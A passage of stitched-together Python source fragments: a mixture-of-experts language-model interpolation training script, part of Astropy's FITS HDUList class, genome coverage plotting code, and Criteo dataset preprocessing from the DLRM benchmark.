assert len(x) == len(y)
indexes = np.arange(len(x))
np.random.shuffle(indexes)
boundary = int(len(x) * test_size)
test_indexes = indexes[:boundary]
train_indexes = indexes[boundary:]
x_train = [x[i] for i in train_indexes]
y_train = [y[i] for i in train_indexes]
x_test = [x[i] for i in test_indexes]
y_test = [y[i] for i in test_indexes]
return x_train, x_test, y_train, y_test, train_indexes, test_indexes
def save_val_pred(hypos, predictions, path):
new_hypos = []
predictions = predictions.astype('float')
start = 0
assert len(hypos) == len(predictions)
for hypo, pred in zip(hypos, predictions):
hypo['pred'] = pred
new_hypos.append(hypo)
with open(path, 'w') as fout:
for hypo in new_hypos:
fout.write(json.dumps(hypo, ensure_ascii=False))
fout.write('\n')
fout.flush()
def read_input(input, debug=False):
hypos = []
fname = 'features_small.jsonl' if args.debug else input
dataset = load_dataset('json', data_files=fname, cache_dir='hf_cache', use_threads=True)
return dataset['train']
parser = argparse.ArgumentParser(description='')
parser.add_argument('--train', type=str, default=None,
help='the input feature file (jsonl)')
parser.add_argument('--val', type=str, default=None,
help='the input feature file (jsonl)')
parser.add_argument('--train-others', type=str, default=None,
help='use a specified jsonl file for others feature if specified')
parser.add_argument('--val-others', type=str, default=None,
help='use a specified jsonl file for others feature if specified')
parser.add_argument('--input', type=str, default=None,
help='the input feature file (jsonl). Multiple files are separated with comma')
parser.add_argument('--negative-weight', type=float, default=1,
help='weight of the loss from negative examples, range [0,1]')
parser.add_argument('--feature-type', type=str, default='all',
help='the features to use, splitted with commas')
parser.add_argument('--seed', type=int, default=22,
help='the random seed')
parser.add_argument('--debug', action='store_true', default=False,
help='debug mode')
# interpolation with ngram kenlm instead of knnlm
parser.add_argument('--train-kenlm', type=str, default=None,
help='the output score file from kenlm querying, note that the scores in this kenlm output \
is in log base 10 by default')
parser.add_argument('--val-kenlm', type=str, default=None,
help='the output score file from kenlm querying, note that the scores in this kenlm output \
is in log base 10 by default')
# training arguments
parser.add_argument('--lr', type=float, default=5e-4, help='learning rate')
parser.add_argument('--l1', type=float, default=0.,
help='l1 regularization coefficient')
parser.add_argument('--batch-size', type=int, default=64, help='batch size')
parser.add_argument('--ngram', type=int, default=0, help='the ngram features to use')
# model hyperparameters
parser.add_argument('--arch', type=str, choices=['mlp', 'lstm'], default='mlp',
help='architectures of the expert model')
parser.add_argument('--activation', type=str, choices=['linear', 'relu'], default='relu',
help='the activation function in mlp')
parser.add_argument('--hidden-units', type=int, default=32, help='hidden units')
parser.add_argument('--nlayers', type=int, default=3, help='number of layerss')
parser.add_argument('--dropout', type=float, default=0, help='dropout')
parser.add_argument('--output-dir', type=str)
parser.add_argument('--move-to-mem', action='store_true', default=False)
parser.add_argument('--load-model', type=str, default=None,
help='load model checkpoint')
parser.add_argument('--eval', action='store_true', default=False,
help='perform evaluation')
parser.add_argument('--save-pred', type=str, default=None,
help='save predictions for analysis')
parser.add_argument('--validate-loss', action='store_true', default=False,
help='save predictions for analysis')
args = parser.parse_args()
# args.output_dir = f'checkpoint/moe/mlp.nh{args.hidden_units}.nl{args.nlayers}.drop{args.dropout}.lr{args.lr}.ft{args.feature_type}.seed{args.seed}'
# if not os.path.isdir(args.output_dir):
# os.makedirs(args.output_dir)
logfile = 'stdout.log' if not args.eval else 'eval.log'
sys.stdout = Logger(os.path.join(args.output_dir, logfile))
print(args)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
if args.input is not None:
hypos = []
if args.debug:
hypos = read_input(None, debug=args.debug)
else:
for fname in args.input.split(','):
hypos.extend(read_input(fname, debug=args.debug))
test_size = 0.2
indexes = np.arange(len(hypos))
# np.random.shuffle(indexes)
boundary = int(len(hypos) * test_size)
test_indexes = indexes[:boundary]
train_indexes = indexes[boundary:]
train_hypos = [hypos[x] for x in train_indexes]
val_hypos = [hypos[x] for x in test_indexes]
else:
train_ctxt_hypos = read_input(args.train + '_ctxt.jsonl', debug=args.debug)
if args.train_others is None:
train_other_hypos = read_input(args.train + '_others.jsonl', debug=args.debug)
else:
train_other_hypos = read_input(args.train_others)
val_ctxt_hypos = read_input(args.val + '_ctxt.jsonl', debug=args.debug)
if args.val_others is None:
val_other_hypos = read_input(args.val + '_others.jsonl', debug=args.debug)
else:
val_ctxt_hypos = read_input(args.val_others)
if args.train_kenlm is not None:
train_kenlm = read_input(args.train_kenlm)
val_kenlm = read_input(args.val_kenlm)
else:
train_kenlm = None
val_kenlm = None
if args.move_to_mem:
train_ctxt_hypos = [train_ctxt_hypos[i] for i in range(len(train_ctxt_hypos))]
train_other_hypos = [train_other_hypos[i] for i in range(len(train_other_hypos))]
val_ctxt_hypos = [val_ctxt_hypos[i] for i in range(len(val_ctxt_hypos))]
val_other_hypos = [val_other_hypos[i] for i in range(len(val_other_hypos))]
print('complete reading jsonl files')
training_set = TokenFeatureDataset(train_ctxt_hypos, train_other_hypos, train_kenlm, ngram=args.ngram)
val_set = TokenFeatureDataset(val_ctxt_hypos, val_other_hypos, val_kenlm, ngram=args.ngram)
train_sampler = torch.utils.data.SequentialSampler(training_set) if args.arch == 'lstm' else None
val_sampler = torch.utils.data.SequentialSampler(val_set) if args.arch == 'lstm' else None
train_dataloader = torch.utils.data.DataLoader(training_set,
batch_size=args.batch_size,
shuffle=False if args.arch == 'lstm' else True,
sampler=train_sampler,
collate_fn=training_set.collater)
val_dataloader = torch.utils.data.DataLoader(val_set,
batch_size=args.batch_size,
shuffle=False,
sampler=val_sampler,
collate_fn=val_set.collater)
nepochs = 10
extra_feature_size = None
feature_set = ['ctxt', 'freq', 'lm_ent', 'lm_max', 'fert']
if args.feature_type == 'all':
feature_size = OrderedDict({key: training_set.get_nfeature(key) for key in feature_set})
else:
feature_size = OrderedDict({key: training_set.get_nfeature(key) for key in args.feature_type.split(',')})
args.feature_size = feature_size
if args.arch == 'mlp':
model = MLPMOE(
feature_size=feature_size,
hidden_units=args.hidden_units,
nlayers=args.nlayers,
dropout=args.dropout,
activation=args.activation,
)
elif args.arch == 'lstm':
model = LSTMMOE(
feature_size=feature_size,
hidden_units=args.hidden_units,
nlayers=args.nlayers,
dropout=args.dropout,
)
# criterion = nn.CrossEntropyLoss(weight=torch.tensor([args.negative_weight, 1]))
if args.load_model:
ckpt_path = os.path.join(args.load_model, 'checkpoint_best.pt')
ckpt = torch.load(ckpt_path)
model.load_state_dict(ckpt['param'])
print(f"loaded model ckpt from {ckpt_path} at epoch {ckpt['epoch']}")
if torch.cuda.is_available():
print('use cuda')
model.cuda()
# criterion.cuda()
print(model)
optimizer = optim.Adam(model.parameters(), lr=args.lr)
model.train()
val_hypos_mem = []
tmp = time.time()
print('moving scores to memory')
for i, hypo in enumerate(val_other_hypos):
if args.val_kenlm is not None:
assert hypo['s'] == val_kenlm[i]['s']
knns = val_kenlm[i]['kenlm_s']
else:
knns = hypo['knn_s']
val_hypos_mem.append({'lm_s': hypo['lm_s'], 'knn_s': knns})
print(f'moving scores consumes {time.time() - tmp} seconds')
tmp = time.time()
print(f'no retrieval ppl {interpolation(val_hypos_mem, np.array([0] * len(val_hypos_mem)))}')
print(f'interpolation costs {time.time() - tmp} seconds')
cutoff_list = [10, 30, 50, 70, 90]
# cutoff_list = [50]
random_mask = {}
# log_str = 'random mask, constant weights, val interpolate ppl (cutoff): '
for cutoff in cutoff_list:
mask = np.zeros(len(val_hypos_mem))
mask[int(len(mask) * (1. - cutoff / 100)):] = 1
np.random.shuffle(mask)
mask = mask.astype('float')
random_mask[cutoff] = mask
if args.eval:
val_loss, prediction_dict = validate(val_dataloader, model, args)
predictions = np.array([prediction_dict[k] for k in range(len(val_hypos_mem))])
log_str = f'val interpolate ppl (cutoff): '
ppl, _ = moe_interpolation(val_hypos_mem, predictions)
log_str += f'0:{ppl:.3f}, '
for cutoff in cutoff_list:
ppl_cutoff, _ = moe_interpolation(val_hypos_mem, predictions, cutoff=cutoff / 100, threshold=ckpt['threshold'])
log_str += f'{cutoff}:{ppl_cutoff:.3f}, '
print(log_str)
log_str = f'random mask, learned weights ppl (cutoff): '
for cutoff in cutoff_list:
ppl_cutoff, _ = moe_interpolation(val_hypos_mem, predictions, cutoff=cutoff / 100, random_mask=random_mask[cutoff])
log_str += f'{cutoff}:{ppl_cutoff:.3f}, '
print(log_str)
log_str = f'learned mask, constant weights | |
of ``"fix"`` or
``"silentfix"`` with ``"+ignore"``, ``+warn``, or ``+exception"
(e.g. ``"fix+warn"``). See :ref:`verify` for more info.
clobber : bool
When `True`, overwrite the output file if exists.
checksum : bool
When `True` adds both ``DATASUM`` and ``CHECKSUM`` cards
to the headers of all HDU's written to the file.
"""
if (len(self) == 0):
warnings.warn("There is nothing to write.", AstropyUserWarning)
return
self.verify(option=output_verify)
# make sure the EXTEND keyword is there if there is extension
self.update_extend()
# make note of whether the input file object is already open, in which
# case we should not close it after writing (that should be the job
# of the caller)
closed = isinstance(fileobj, string_types) or fileobj_closed(fileobj)
# writeto is only for writing a new file from scratch, so the most
# sensible mode to require is 'ostream'. This can accept an open
# file object that's open to write only, or in append/update modes
# but only if the file doesn't exist.
fileobj = _File(fileobj, mode='ostream', clobber=clobber)
hdulist = self.fromfile(fileobj)
for hdu in self:
hdu._prewriteto(checksum=checksum)
try:
hdu._writeto(hdulist._file)
finally:
hdu._postwriteto()
hdulist.close(output_verify=output_verify, closed=closed)
def close(self, output_verify='exception', verbose=False, closed=True):
"""
Close the associated FITS file and memmap object, if any.
Parameters
----------
output_verify : str
Output verification option. Must be one of ``"fix"``,
``"silentfix"``, ``"ignore"``, ``"warn"``, or
``"exception"``. May also be any combination of ``"fix"`` or
``"silentfix"`` with ``"+ignore"``, ``+warn``, or ``+exception"
(e.g. ``"fix+warn"``). See :ref:`verify` for more info.
verbose : bool
When `True`, print out verbose messages.
closed : bool
When `True`, close the underlying file object.
"""
if self._file:
if self._file.mode in ['append', 'update']:
self.flush(output_verify=output_verify, verbose=verbose)
if closed and hasattr(self._file, 'close'):
self._file.close()
# Give individual HDUs an opportunity to do on-close cleanup
for hdu in self:
hdu._close(closed=closed)
def info(self, output=None):
"""
Summarize the info of the HDUs in this `HDUList`.
Note that this function prints its results to the console---it
does not return a value.
Parameters
----------
output : file, bool, optional
A file-like object to write the output to. If `False`, does not
output to a file and instead returns a list of tuples representing
the HDU info. Writes to ``sys.stdout`` by default.
"""
if output is None:
output = sys.stdout
if self._file is None:
name = '(No file associated with this HDUList)'
else:
name = self._file.name
results = ['Filename: %s' % name,
'No. Name Type Cards Dimensions Format']
format = '%-3d %-10s %-11s %5d %-10s %s %s'
default = ('', '', 0, (), '', '')
for idx, hdu in enumerate(self):
summary = hdu._summary()
if len(summary) < len(default):
summary += default[len(summary):]
summary = (idx,) + summary
if output:
results.append(format % summary)
else:
results.append(summary)
if output:
output.write('\n'.join(results))
output.write('\n')
output.flush()
else:
return results[2:]
def filename(self):
"""
Return the file name associated with the HDUList object if one exists.
Otherwise returns None.
Returns
-------
filename : a string containing the file name associated with the
HDUList object if an association exists. Otherwise returns
None.
"""
if self._file is not None:
if hasattr(self._file, 'name'):
return self._file.name
return None
@classmethod
def _readfrom(cls, fileobj=None, data=None, mode=None,
memmap=None, save_backup=False, cache=True, **kwargs):
"""
Provides the implementations from HDUList.fromfile and
HDUList.fromstring, both of which wrap this method, as their
implementations are largely the same.
"""
if fileobj is not None:
if not isinstance(fileobj, _File):
# instantiate a FITS file object (ffo)
ffo = _File(fileobj, mode=mode, memmap=memmap, cache=cache)
else:
ffo = fileobj
# The pyfits mode is determined by the _File initializer if the
# supplied mode was None
mode = ffo.mode
hdulist = cls(file=ffo)
else:
if mode is None:
# The default mode
mode = 'readonly'
hdulist = cls()
# This method is currently only called from HDUList.fromstring and
# HDUList.fromfile. If fileobj is None then this must be the
# fromstring case; the data type of ``data`` will be checked in the
# _BaseHDU.fromstring call.
hdulist._save_backup = save_backup
saved_compression_enabled = compressed.COMPRESSION_ENABLED
try:
if ('disable_image_compression' in kwargs and
kwargs['disable_image_compression']):
compressed.COMPRESSION_ENABLED = False
# read all HDUs
while True:
try:
if fileobj is not None:
if ffo.writeonly:
# Output stream--not interested in reading/parsing
# the HDUs--just writing to the output file
return hdulist
try:
hdu = _BaseHDU.readfrom(ffo, **kwargs)
except EOFError:
break
except IOError:
if ffo.writeonly:
break
else:
raise
else:
if not data:
break
hdu = _BaseHDU.fromstring(data)
data = data[hdu._data_offset + hdu._data_size:]
hdulist.append(hdu)
hdu._new = False
if 'checksum' in kwargs:
hdu._output_checksum = kwargs['checksum']
# check in the case there is extra space after the last HDU or
# corrupted HDU
except (VerifyError, ValueError) as exc:
warnings.warn(
'Error validating header for HDU #%d (note: Astropy '
'uses zero-based indexing).\n%s\n'
'There may be extra bytes after the last HDU or the '
'file is corrupted.' %
(len(hdulist), indent(str(exc))), VerifyWarning)
del exc
break
# If we're trying to read only and no header units were found,
# raise and exception
if mode in ('readonly', 'denywrite') and len(hdulist) == 0:
raise IOError('Empty or corrupt FITS file')
# initialize/reset attributes to be used in "update/append" mode
hdulist._resize = False
hdulist._truncate = False
finally:
compressed.COMPRESSION_ENABLED = saved_compression_enabled
return hdulist
def _verify(self, option='warn'):
text = ''
errs = _ErrList([], unit='HDU')
# the first (0th) element must be a primary HDU
if len(self) > 0 and (not isinstance(self[0], PrimaryHDU)) and \
(not isinstance(self[0], _NonstandardHDU)):
err_text = "HDUList's 0th element is not a primary HDU."
fix_text = 'Fixed by inserting one as 0th HDU.'
def fix(self=self):
self.insert(0, PrimaryHDU())
err = self.run_option(option, err_text=err_text,
fix_text=fix_text, fix=fix)
errs.append(err)
if len(self) > 1 and ('EXTEND' not in self[0].header or
self[0].header['EXTEND'] is not True):
err_text = ('Primary HDU does not contain an EXTEND keyword '
'equal to T even though there are extension HDUs.')
fix_text = 'Fixed by inserting or updating the EXTEND keyword.'
def fix(header=self[0].header):
naxis = header['NAXIS']
if naxis == 0:
after = 'NAXIS'
else:
after = 'NAXIS' + str(naxis)
header.set('EXTEND', value=True, after=after)
errs.append(self.run_option(option, err_text=err_text,
fix_text=fix_text, fix=fix))
# each element calls their own verify
for idx, hdu in enumerate(self):
if idx > 0 and (not isinstance(hdu, ExtensionHDU)):
err_text = ("HDUList's element %s is not an extension HDU." %
str(idx))
err = self.run_option(option, err_text=err_text, fixable=False)
errs.append(err)
else:
result = hdu._verify(option)
if result:
errs.append(result)
return errs
def _flush_update(self):
"""Implements flushing changes to a file in update mode."""
for hdu in self:
# Need to all _prewriteto() for each HDU first to determine if
# resizing will be necessary
hdu._prewriteto(checksum=hdu._output_checksum, inplace=True)
try:
self._wasresized()
# if the HDUList is resized, need to write out the entire contents of
# the hdulist to the file.
if self._resize or self._file.compression:
self._flush_resize()
else:
# if not resized, update in place
for hdu in self:
hdu._writeto(self._file, inplace=True)
# reset the modification attributes after updating
for hdu in self:
hdu._header._modified = False
finally:
for hdu in self:
hdu._postwriteto()
def _flush_resize(self):
"""
Implements flushing changes in update mode when parts of one or more HDU
need to be resized.
"""
old_name = self._file.name
old_memmap = self._file.memmap
name = _tmp_name(old_name)
if not self._file.file_like:
old_mode = os.stat(old_name).st_mode
# The underlying file is an actual file object. The HDUList is
# resized, so we need to write it to a tmp file, delete the
# original file, and rename the tmp file to the original file.
if self._file.compression == 'gzip':
new_file = gzip.GzipFile(name, mode='ab+')
elif self._file.compression == 'bzip2':
new_file = bz2.BZ2File(name, mode='w')
else:
new_file = name
hdulist = self.fromfile(new_file, mode='append')
for hdu in self:
hdu._writeto(hdulist._file, inplace=True, copy=True)
if sys.platform.startswith('win'):
# Collect a list of open mmaps to the data; this well be used
# later. See below.
mmaps = [(idx, _get_array_mmap(hdu.data), hdu.data)
for idx, hdu in enumerate(self) if hdu._has_data]
hdulist._file.close()
self._file.close()
if sys.platform.startswith('win'):
# Close all open mmaps to the data. This is only necessary on
# Windows, which will not allow a file to be renamed or deleted
# until all handles to that file have been closed.
for idx, mmap, arr in mmaps:
if mmap is not None:
| |
stats[0].otherReferenceName) )
fig, pdf = libplot.initImage( 12.0, 8.0, options )
axes = fig.add_axes( [0.09, 0.2, 0.9, 0.6] )
drawCompareData( axes, options, stats, isAbs )
libplot.writeImage( fig, pdf, options )
#================== DRAW ONLY BASES OF EACH SAMPLE THAT MAPPED TO CACTUS REF ==================
def drawCompareData2( axes, options, stats, isAbs ):
if len(stats) == 0:
return
#if isAbs, draw absolute values. If not, draw proportion (relative values)
lines = []
linenames = [ stats[0].otherReferenceName, stats[0].referenceName, "total" ]
#X data:
x1data = []
currx = -1
for i,s in enumerate( stats ):
if s.name == 'all':
continue
if s.name == 'average' or s.name == 'panTro3':
currx += 1.5
else:
currx += 1
x1data.append( currx )
y1data = []
for sample in stats:
if sample.name == 'all':
continue
if isAbs:
y1data.append( sample.referenceBasesMapped )
else:
y1data.append( 100.0*sample.referenceBasesMapped/sample.totalBases )
barwidth = 0.6
#barwidth = 0.25
l1 = axes.bar( x1data, y1data, barwidth, color = "#E31A1C", ec="w" )
lines.append( l1[0] )
libplot.editSpine( axes )
axes.set_title("Sample Coverage") #TO BE NAMED
#set ticks:
samples = []
for sample in stats:
if sample.name == 'all':
continue
samples.append( libplot.properName(sample.name) )
fontP = FontProperties()
fontP.set_size('small')
pyplot.xticks( [x + barwidth/2.0 for x in x1data], samples, rotation=45, fontproperties=fontP )
pyplot.yticks( fontproperties=fontP )
#HACK:
yticks = range(2000000, 6000000, 500000)
yticklabels = [ float(y)/1000000 for y in yticks ]
axes.set_yticks(yticks)
axes.set_yticklabels(yticklabels)
pyplot.xlabel("Samples")
pyplot.ylabel("Number of positions (in millions)")
axes.xaxis.set_ticks_position( 'bottom' )
axes.yaxis.set_ticks_position( 'left' )
miny = min( y1data )
miny = miny*0.9
axes.set_ylim( miny, max(y1data) )
axes.set_xlim(-0.5, max(x1data) + 0.5 )
axes.yaxis.grid(b=True, color="#A8A8A8", linestyle='-', linewidth=0.25)
#Legend:
box = axes.get_position()
axes.set_position( [box.x0, box.y0, box.width*0.95, box.height*0.9] )
#legend = axes.legend( lines, [libplot.properName(n) for n in linenames], prop=fontP, loc="best", bbox_to_anchor=(0.2, 1) )
#legend._drawFrame=False
return
def drawCompareCoveragePlot2( options, stats, isAbs ):
if len(stats) == 0:
return
prefix = "cmpCoverage2_"
if not isAbs:
prefix = "cmpRelCoverage2_"
options.out = os.path.join( options.outdir, "%s%s_%s" %(prefix, stats[0].referenceName, stats[0].otherReferenceName) )
fig, pdf = libplot.initImage( 12.0, 8.0, options )
axes = fig.add_axes( [0.09, 0.2, 0.9, 0.6] )
drawCompareData2( axes, options, stats, isAbs )
libplot.writeImage( fig, pdf, options )
#================ display data in scatter plot form, xaxis = number of sample covered, yaxis = number of bases
def drawScatter( axes, options, stats, type, cumulative ):
if len(stats) < 4:
return
title = "Distribution of Positions Shared Among Samples"
if cumulative:
title = "Cumulative Distribution of Positions Shared Among Samples"
axes.set_title(title) #TO BE NAMED
#samples = ["panTro3", "minusOtherReference", "average", "reference", "hg19"]
samples = ["reference", "hg19", "panTro3", "average"]
if type == 'noHg19':
samples = ["minusOtherReference"]
xdata = range( 0, len(stats) -4 )
#print xdata
ydataList = []
miny = float('inf')
maxy = float('-inf')
for name in samples:
for s in stats:
if s.name == name:
ydata = s.baseCoverages[: len(stats) -4]
if cumulative:
ydata = [ sum(ydata[i:]) for i in xrange( len(ydata) ) ]
ydataList.append( ydata )
miny = min( [miny, min(ydata)] )
maxy = max( [maxy, max(ydata)] )
break
lines = []
#colors = libplot.getColors0()
colors =["#E31A1C", "#1F78B4", "#3D3D3D", "#4DAF4A"] #ConsensusRef, GRCh37, chimp, average
c = -1
offset = 0.12
axes.set_yscale('log')
#if type == 'noHg19':
# axes.set_yscale('log')
for i in xrange( len(samples) ):
xdatai = [x + offset*i for x in xdata]
ydata = ydataList[i]
c += 1
if i == 0:
axes.plot(xdatai[1:], ydata[1:], color="#CCCCCC", linestyle='-', linewidth=0.002)
else:
axes.plot(xdatai, ydata, color="#CCCCCC", linestyle='-', linewidth=0.002)
l = axes.plot(xdatai, ydata, color=colors[c], marker='.', markersize=12.0, linestyle='none')
lines.append(l)
fontP = FontProperties()
fontP.set_size('x-small')
yrange = maxy - miny
miny = miny - 10
maxy = maxy + yrange*0.1
xmin = -0.4
xmax = len(stats) - 4 -1 + offset*len(samples) + offset
libplot.editSpine(axes)
axes.set_xticks( [ i + offset*(len(samples)/2.0 ) for i in range(0, len(stats) -4)] )
axes.set_xticklabels( range(1, len(stats) -2) )
axes.xaxis.set_ticks_position( 'bottom' )
axes.yaxis.set_ticks_position( 'left' )
scale = len(str( int(maxy) )) - 1
ylabel = "Number of positions"
if type == "noHg19":
yticks = [ 10**y for y in range(scale + 1) ]
else:
#yticks = [ 10**y for y in range(scale + 2) ]
yticks = []
for y in range(scale + 1):
for y1 in range(1,10):
yticks.append(y1*(10**y))
axes.set_yticks( yticks )
minorLocator = LogLocator( base=10, subs = range(1, 10) )
axes.yaxis.set_minor_locator( minorLocator )
#else:
# yticks = range(0, int(maxy), 10**scale)
# yticklabels = [ y/(10**scale) for y in yticks ]
# axes.set_yticks( yticks )
# axes.set_yticklabels( yticklabels )
# ylabel += " (x%s)" %( libplot.prettyInt(10**scale) )
#ylabel += " (in millions)"
axes.set_xlim(xmin, xmax)
if type == "noHg19":
axes.set_ylim(miny, maxy)
else:
axes.set_ylim(10000, 1000000)#HACK
if type != 'noHg19':
legend = pyplot.legend( lines, [libplot.properName(s) for s in samples], numpoints=1, loc='lower right', prop=fontP )
legend._drawFrame = False
axes.set_xlabel( 'Number of samples' )
#if type == "noHg19":
# ylabel += " (x %d)" %(10**(scale -1))
axes.set_ylabel( ylabel )
#axes.xaxis.grid(b=True, color="#CCCCCC", linestyle='-', linewidth=0.005)
axes.yaxis.grid(b=True, color="#CCCCCC", linestyle='-', linewidth=0.005)
return
def drawScatterPlot( options, stats, type, cumulative ):
prefix = "coverageScatter_%s" %type
if cumulative:
prefix += "_culm"
options.out = os.path.join( options.outdir, "%s" %(prefix) )
fig, pdf = libplot.initImage( 12.0, 8.0, options )
axes = fig.add_axes( [0.1, 0.15, 0.85, 0.75] )
drawScatter( axes, options, stats, type, cumulative )
libplot.writeImage( fig, pdf, options )
#=================
def readfiles( options ):
statsList = [] #each element represents one input xml file
for f in options.files:
name = os.path.basename( f ).split( '.' )[0]
#print "file %s" %name
#stats = Stats(name)
stats = []
xmltree = ET.parse( f )
root = xmltree.getroot()
for sample in root.findall( 'statsForSample' ):
name = sample.attrib[ 'sampleName' ]
if name != '' and name != 'ROOT' and name not in options.filteredSamples:
stats.append( Sample( sample ) )
#if len(stats) > 0:
# stats.setRefName( stats[0].referenceName )
# stats.setOtherRefName( stats[0].otherReferenceName )
statsList.append( stats )
return statsList
def readRepeatInfo(file):
f = open(file, 'r')
sample2repeat = {} #key = sample, vals = [totalBases, repetitiveBases, Percentage]
f.readline()
for line in f.readlines():
items = line.strip().split('\t')
if len(items) < 4:
continue
sample2repeat[ items[0] ] = [ int(items[1]), int(items[2]), float(items[3]) ]
#Calculate average:
avr = [0, 0, 0]
numSamples = 0
for sample in sample2repeat:
if sample == 'panTro3':
continue
numSamples += 1
for i, val in enumerate( sample2repeat[sample] ):
avr[i] += val
if numSamples > 0:
for i in xrange( len(avr) ):
avr[i] /= numSamples
sample2repeat['average'] = avr
return sample2repeat
def initOptions( parser ):
parser.add_option('--title', dest='title', default='Coverage statistics', help='Based title of the plots, default=%default')
parser.add_option('--ycutoff', dest='ycutoff', default=0.9, type='float')
parser.add_option('--outdir', dest='outdir', default='.')
parser.add_option('--filteredSamples', dest='filteredSamples', help='Hyphen separated list of samples that were filtered out (not to include in the plot)')
parser.add_option('--repeatInfo', dest='repeatInfo', default='/hive/users/nknguyen/reconGit/referenceScripts/data/seqRepeatPercentage.txt')
#parser.add_option('--samplesOrder', dest='samplesOrder', default='', help='Order of the samples to display')
def checkOptions( args, options, parser ):
if len(args) < 1:
parser.error('Please specify at least one coverageStat.xml file\n')
options.files = []
for f in args:
if not os.path.exists( f ):
parser.error( '%s does not exist\n' %f )
else:
options.files.append( os.path.abspath( f ) )
if options.filteredSamples:
options.filteredSamples = options.filteredSamples.split('-')
else:
options.filteredSamples = []
def main():
usage = ( 'usage: %prog [options] file1.xml file2.xml\n\n'
'%prog takes in coverageStats.xml files and create an image file' )
parser = OptionParser( usage = usage )
initOptions( parser )
libplot.initOptions( parser )
options, args = parser.parse_args()
checkOptions( args, options, parser )
libplot.checkOptions( options, parser )
statsList = readfiles( options )
sample2repeat = readRepeatInfo( options.repeatInfo )
for stats in statsList:
stats.sort()
stats1 = []
for s in stats:
if s.name != 'all':
stats1.append(s)
drawCoveragePlot( options, stats1, True, 0 )
drawCoveragePlot( options, stats1, False, 0 )
if options.ycutoff > 0:
drawCoveragePlot( options, stats1, True, options.ycutoff )
drawCoveragePlot( options, stats1, False, options.ycutoff )
#sort by totalBases:
specialcases = {'average':None, 'all':None, 'panTro3':None}
sortedstats = []
for i in xrange( len(stats) ):
if stats[i].name in [ stats[i].referenceName, stats[i].otherReferenceName, 'minusOtherReference' ]:
continue
if stats[i].name in specialcases:
specialcases[ stats[i].name ] = stats[i]
else:
sortedstats.append( stats[i] )
sortedstats = sorted( sortedstats, key=lambda s: s.totalBases, reverse=True )
for k in specialcases:
s = specialcases[k]
if s:
sortedstats.append( s )
if len(sortedstats) > 0:
drawCompareCoveragePlot( options, sortedstats, True )
drawCompareCoverageTab( options, sortedstats, sample2repeat )
#sort by totalBases, but | |
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
#
# Description: generate inputs and targets for the DLRM benchmark
#
# Utility function(s) to download and pre-process public data sets
# - Criteo Kaggle Display Advertising Challenge Dataset
# https://labs.criteo.com/2014/02/kaggle-display-advertising-challenge-dataset
import os
import sys
from multiprocessing import Manager, Process
import numpy as np
def processCriteoAdData(d_path, d_file, npzfile, i, convertDicts, pre_comp_counts):
# Process Kaggle Display Advertising Challenge or Terabyte Dataset
# by converting unicode strings in X_cat to integers and
# converting negative integer values in X_int.
#
# Loads data in the form "{kaggle|terabyte}_day_i.npz" where i is the day.
#
# Inputs:
# d_path (str): path for {kaggle|terabyte}_day_i.npz files
# i (int): splits in the dataset (typically 0 to 7 or 0 to 24)
# process data if not all files exist
filename_i = npzfile + "_{0}_processed.npz".format(i)
if os.path.exists(filename_i):
print("Using existing " + filename_i, end="\n")
else:
print("Not existing " + filename_i)
with np.load(npzfile + "_{0}.npz".format(i)) as data:
# Approach 2a: using pre-computed dictionaries
X_cat_t = np.zeros(data["X_cat_t"].shape)
for j in range(26):
for k, x in enumerate(data["X_cat_t"][j, :]):
X_cat_t[j, k] = convertDicts[j][x]
# continuous features
X_int = data["X_int"]
X_int[X_int < 0] = 0
# targets
y = data["y"]
np.savez_compressed(
filename_i,
# X_cat = X_cat,
X_cat=np.transpose(X_cat_t), # transpose of the data
X_int=X_int,
y=y,
)
print("Processed " + filename_i, end="\n")
# sanity check (applicable only if counts have been pre-computed & are re-computed)
# for j in range(26):
# if pre_comp_counts[j] != counts[j]:
# sys.exit("ERROR: Sanity check on counts has failed")
# print("\nSanity check on counts passed")
return
def concatCriteoAdData(
d_path,
d_file,
npzfile,
trafile,
days,
data_split,
randomize,
total_per_file,
total_count,
o_filename
):
# Concatenates different days and saves the result.
#
# Inputs:
# days (int): total number of days in the dataset (typically 7 or 24)
# d_path (str): path for {kaggle|terabyte}_day_i.npz files
# o_filename (str): output file name
#
# Output:
# o_file (str): output file path
print("Concatenating multiple days into %s.npz file" % str(d_path + o_filename))
# load and concatenate data
for i in range(days):
filename_i = npzfile + "_{0}_processed.npz".format(i)
with np.load(filename_i) as data:
if i == 0:
X_cat = data["X_cat"]
X_int = data["X_int"]
y = data["y"]
else:
X_cat = np.concatenate((X_cat, data["X_cat"]))
X_int = np.concatenate((X_int, data["X_int"]))
y = np.concatenate((y, data["y"]))
print("Loaded day:", i, "y = 1:", len(y[y == 1]), "y = 0:", len(y[y == 0]))
with np.load(d_path + d_file + "_fea_count.npz") as data:
counts = data["counts"]
print("Loaded counts!")
np.savez_compressed(
d_path + o_filename + ".npz",
X_cat=X_cat,
X_int=X_int,
y=y,
counts=counts,
)
return d_path + o_filename + ".npz"
def getCriteoAdData(
datafile,
o_filename,
max_ind_range=-1,
sub_sample_rate=0.0,
days=7,
data_split='train',
randomize='total',
dataset_multiprocessing=False,
):
# Passes through entire dataset and defines dictionaries for categorical
# features and determines the number of total categories.
#
# Inputs:
# datafile : path to downloaded raw data file
# o_filename (str): saves results under o_filename if filename is not ""
#
# Output:
# o_file (str): output file path
#split the datafile into path and filename
lstr = datafile.split("/")
d_path = "/".join(lstr[0:-1]) + "/"
d_file = lstr[-1].split(".")[0]
npzfile = d_path + ((d_file + "_day"))
trafile = d_path + ((d_file + "_fea"))
# count number of datapoints in training set
total_file = d_path + d_file + "_day_count.npz"
if os.path.exists(total_file):
with np.load(total_file) as data:
total_per_file = list(data["total_per_file"])
total_count = np.sum(total_per_file)
print("Skipping counts per file (already exist)")
else:
total_count = 0
total_per_file = []
# WARNING: The raw data consists of a single train.txt file
# Each line in the file is a sample, consisting of 13 continuous and
# 26 categorical features (an extra space indicates that feature is
# missing and will be interpreted as 0).
if os.path.exists(datafile):
print("Reading data from path=%s" % (datafile))
with open(str(datafile)) as f:
for _ in f:
total_count += 1
total_per_file.append(total_count)
# reset total per file due to split
num_data_per_split, extras = divmod(total_count, days)
total_per_file = [num_data_per_split] * days
for j in range(extras):
total_per_file[j] += 1
# split into days (simplifies code later on)
file_id = 0
boundary = total_per_file[file_id]
nf = open(npzfile + "_" + str(file_id), "w")
with open(str(datafile)) as f:
for j, line in enumerate(f):
if j == boundary:
